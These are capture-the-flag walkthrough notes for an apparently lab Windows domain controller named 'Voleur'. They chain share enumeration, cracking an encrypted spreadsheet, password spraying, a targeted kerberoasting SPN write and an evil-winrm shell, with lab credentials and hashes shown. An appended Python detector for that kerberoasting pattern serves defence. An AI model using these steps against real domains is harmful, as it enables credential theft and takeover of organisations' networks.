Voleur
#medium #windows

Username: ryan.naylor
Password: HollowOct31Nyt


sudo nmap -sS -p- --min-rate 5000 -Pn -n -vv 10.10.11.76 -oA allPorts
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
2222/tcp open EtherNetIP-1 syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
57998/tcp open unknown syn-ack ttl 127
57999/tcp open unknown syn-ack ttl 127
58011/tcp open unknown syn-ack ttl 127
58016/tcp open unknown syn-ack ttl 127
58028/tcp open unknown syn-ack ttl 127

nmap -p 53,88,135,139,389,445,464,593,636,2222,3268,3269,5985,9389,49664,49667,57998,57999,58011,58016,58028 -sCV -Pn -n -vv 10.10.11.76 -oA openPortsServicesVersion
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-11-05 23:49:21Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: voleur.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
2222/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMkGDGeRmex5q16ficLqbT7FFvQJxdJZsJ01vdVjKBXfMIC/oAcLPRUwu5yBZeQoOvWF8yIVDN/FJPeqjT9cgxg=
| 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILv295drVe3lopPEgZsjMzOVlk4qZZfFz1+EjXGebLCR
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: voleur.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
57998/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
57999/tcp open msrpc syn-ack Microsoft Windows RPC
58011/tcp open msrpc syn-ack Microsoft Windows RPC
58016/tcp open msrpc syn-ack Microsoft Windows RPC
58028/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 48495/tcp): CLEAN (Timeout)
| Check 2 (port 21268/tcp): CLEAN (Timeout)
| Check 3 (port 60782/udp): CLEAN (Timeout)
| Check 4 (port 31294/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 7h59m58s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-11-05T23:50:17
|_ start_date: N/A

echo "10.10.11.76 DC.voleur.htb voleur.htb DC" | sudo tee -a /etc/hosts

netexec smb DC.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -d voleur.htb -k --generate-krb5-file voleur.krb5
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] krb5 conf saved to: voleur.krb5
SMB DC.voleur.htb 445 DC [+] Run the following command to use the conf file: export KRB5_CONFIG=voleur.krb5
SMB DC.voleur.htb 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt

cat voleur.krb5 | sudo tee /etc/krb5.conf

nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB DC.voleur.htb 445 DC [*] Enumerated shares
SMB DC.voleur.htb 445 DC Share Permissions Remark
SMB DC.voleur.htb 445 DC ----- ----------- ------
SMB DC.voleur.htb 445 DC ADMIN$ Remote Admin
SMB DC.voleur.htb 445 DC C$ Default share
SMB DC.voleur.htb 445 DC Finance
SMB DC.voleur.htb 445 DC HR
SMB DC.voleur.htb 445 DC IPC$ READ Remote IPC
SMB DC.voleur.htb 445 DC IT READ
SMB DC.voleur.htb 445 DC NETLOGON READ Logon server share
SMB DC.voleur.htb 445 DC SYSVOL READ Logon server share

nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -d voleur.htb -k --shares --spider IT --regex .
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB DC.voleur.htb 445 DC [*] Enumerated shares
SMB DC.voleur.htb 445 DC Share Permissions Remark
SMB DC.voleur.htb 445 DC ----- ----------- ------
SMB DC.voleur.htb 445 DC ADMIN$ Remote Admin
SMB DC.voleur.htb 445 DC C$ Default share
SMB DC.voleur.htb 445 DC Finance
SMB DC.voleur.htb 445 DC HR
SMB DC.voleur.htb 445 DC IPC$ READ Remote IPC
SMB DC.voleur.htb 445 DC IT READ
SMB DC.voleur.htb 445 DC NETLOGON READ Logon server share
SMB DC.voleur.htb 445 DC SYSVOL READ Logon server share
SMB DC.voleur.htb 445 DC [*] Spidering .
SMB DC.voleur.htb 445 DC //DC.voleur.htb/IT/. [dir]
SMB DC.voleur.htb 445 DC //DC.voleur.htb/IT/.. [dir]
SMB DC.voleur.htb 445 DC //DC.voleur.htb/IT/First-Line Support [dir]
SMB DC.voleur.htb 445 DC //DC.voleur.htb/IT/First-Line Support/. [dir]
SMB DC.voleur.htb 445 DC //DC.voleur.htb/IT/First-Line Support/.. [dir]
SMB DC.voleur.htb 445 DC //DC.voleur.htb/IT/First-Line Support/Access_Review.xlsx [lastm:'2025-05-29 19:23' size:16896]

nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -d voleur.htb -k --share IT --get-file 'First-Line Support\\Access_Review.xlsx' Access_Review.xlsx
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB DC.voleur.htb 445 DC [*] Copying "First-Line Support\\Access_Review.xlsx" to "Access_Review.xlsx"
SMB DC.voleur.htb 445 DC [+] File "First-Line Support\\Access_Review.xlsx" was downloaded to "Access_Review.xlsx"

file Access_Review.xlsx
Access_Review.xlsx: CDFV2 Encrypted

office2john Access_Review.xlsx > hash
Access_Review.xlsx:$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c

john hash --pot=password.txt --wordlist=/usr/share/wordlists/rockyou.txt
$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c:football1

libreoffice Access_Review.xlsx
Usernames:
Ryan.Naylor
Marie.Bryant
Lacey.Miller
Todd.Wolfe
Jeremy.Combs
Administrator
svc_backup
svc_ldap
svc_iis
svc_winrm
Passwords:
M1XyC9pW7qT5Vn
N5pXyW1VqM7CZ8

nxc smb DC.voleur.htb -u users.txt -p passwords.txt -k --continue-on-success
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC.voleur.htb 445 DC [-] voleur.htb\Ryan.Naylor:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [-] voleur.htb\Marie.Bryant:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [-] voleur.htb\Lacey.Miller:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [-] voleur.htb\Todd.Wolfe:M1XyC9pW7qT5Vn KDC_ERR_C_PRINCIPAL_UNKNOWN
SMB DC.voleur.htb 445 DC [-] voleur.htb\Jeremy.Combs:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [-] voleur.htb\Administrator:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [-] voleur.htb\svc_backup:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn
SMB DC.voleur.htb 445 DC [-] voleur.htb\svc_iis:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [-] voleur.htb\svc_winrm:M1XyC9pW7qT5Vn KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [-] voleur.htb\Ryan.Naylor:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [-] voleur.htb\Marie.Bryant:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [-] voleur.htb\Lacey.Miller:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [-] voleur.htb\Todd.Wolfe:N5pXyW1VqM7CZ8 KDC_ERR_C_PRINCIPAL_UNKNOWN
SMB DC.voleur.htb 445 DC [-] voleur.htb\Jeremy.Combs:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [-] voleur.htb\Administrator:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [-] voleur.htb\svc_backup:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED
SMB DC.voleur.htb 445 DC [+] voleur.htb\svc_iis:N5pXyW1VqM7CZ8
SMB DC.voleur.htb 445 DC [-] voleur.htb\svc_winrm:N5pXyW1VqM7CZ8 KDC_ERR_PREAUTH_FAILED

bloodhound-python -u 'ryan.naylor' -d 'voleur.htb' -p 'HollowOct31Nyt' -c all --zip -ns 10.10.11.76 --dns-tcp

getTGT.py voleur.htb/svc_ldap -dc-ip 10.10.11.76
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Saving ticket in svc_ldap.ccache

export KRB5CCNAME=svc_ldap.ccache

bloodyAD -d voleur.htb -k --host dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn set object svc_winrm servicePrincipalName -v 'http/whatever'
[+] svc_winrm's servicePrincipalName has been updated

netexec ldap dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k --kerberoasting svc_winrm.hash
LDAP dc.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP dc.voleur.htb 389 DC [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn
LDAP dc.voleur.htb 389 DC [*] Skipping disabled account: krbtgt
LDAP dc.voleur.htb 389 DC [*] Total of records returned 1
LDAP dc.voleur.htb 389 DC [*] sAMAccountName: svc_winrm, memberOf: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb, pwdLastSet: 2025-01-31 06:10:12.398769, lastLogon: 2025-01-29 12:07:32.711487
LDAP dc.voleur.htb 389 DC $krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$ecdbd070b6980c00b9e01ac5d6b74821$...

... svc_winrm.hash /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$ecdbd070b6980c00b9e01ac5d6b74821$...:AFireInsidedeOzarctica980219afi

getTGT.py voleur.htb/svc_winrm -dc-ip 10.10.11.76
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Saving ticket in svc_winrm.ccache

export KRB5CCNAME=svc_winrm.ccache

evil-winrm -i dc.voleur.htb -r voleur.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>
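
A defender's view of the servicePrincipalName write and the RC4 service-ticket request shown above, as an added example that is not part of the original write-up: it correlates directory-change events (5136) that add an SPN to another account with etype 0x17 ticket requests (4769) for that account shortly afterwards. The event records, the ten-minute window and the function names are constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample records (not from a real host). Field names follow Windows
# Security events 5136 (directory object modified) and 4769 (service ticket requested).
EVENTS = [
    {"id": 5136, "time": "2025-11-06T00:02:10", "SubjectUserName": "svc_ldap",
     "ObjectDN": "CN=svc_winrm,CN=Users,DC=voleur,DC=htb", "OperationType": "%%14674",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "http/whatever"},
    {"id": 4769, "time": "2025-11-06T00:02:55", "TargetUserName": "svc_ldap@VOLEUR.HTB",
     "ServiceName": "svc_winrm", "TicketEncryptionType": "0x17"},
    {"id": 4769, "time": "2025-11-06T00:03:30", "TargetUserName": "ryan.naylor@VOLEUR.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12"},
    {"id": 5136, "time": "2025-11-06T01:00:00", "SubjectUserName": "WS01$",
     "ObjectDN": "CN=WS01,CN=Computers,DC=voleur,DC=htb", "OperationType": "%%14674",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "HOST/WS01"},
    {"id": 4769, "time": "2025-11-06T03:00:00", "TargetUserName": "lacey.miller@VOLEUR.HTB",
     "ServiceName": "svc_winrm", "TicketEncryptionType": "0x17"},
]

VALUE_ADDED = "%%14674"  # OperationType for "Value Added" in event 5136
RC4_HMAC = "0x17"        # etype 23, the $krb5tgs$23$ ticket type in the output above

def first_rdn(dn):
    # Assumes the object's CN equals its sAMAccountName (true for the sample data).
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def find_targeted_kerberoast(events, window=timedelta(minutes=10)):
    """Flag RC4 service tickets for accounts that just had an SPN added by someone else."""
    spn_writes, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 5136:
            if (ev["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
                    and ev["OperationType"] == VALUE_ADDED):
                target, writer = first_rdn(ev["ObjectDN"]), ev["SubjectUserName"].lower()
                if writer.rstrip("$") != target:  # ignore accounts registering their own SPN
                    spn_writes[target] = (when, writer, ev["AttributeValue"])
        elif ev["id"] == 4769 and ev["TicketEncryptionType"].lower() == RC4_HMAC:
            hit = spn_writes.get(ev["ServiceName"].lower())
            if hit and when - hit[0] <= window:
                alerts.append({"target": ev["ServiceName"], "writer": hit[1],
                               "spn": hit[2], "requester": ev["TargetUserName"]})
    return alerts

if __name__ == "__main__":
    for alert in find_targeted_kerberoast(EVENTS):
        print(alert)
```

Event 5136 is only logged when directory service change auditing and a matching SACL are in place, so the correlation depends on that audit policy being enabled on the domain controllers.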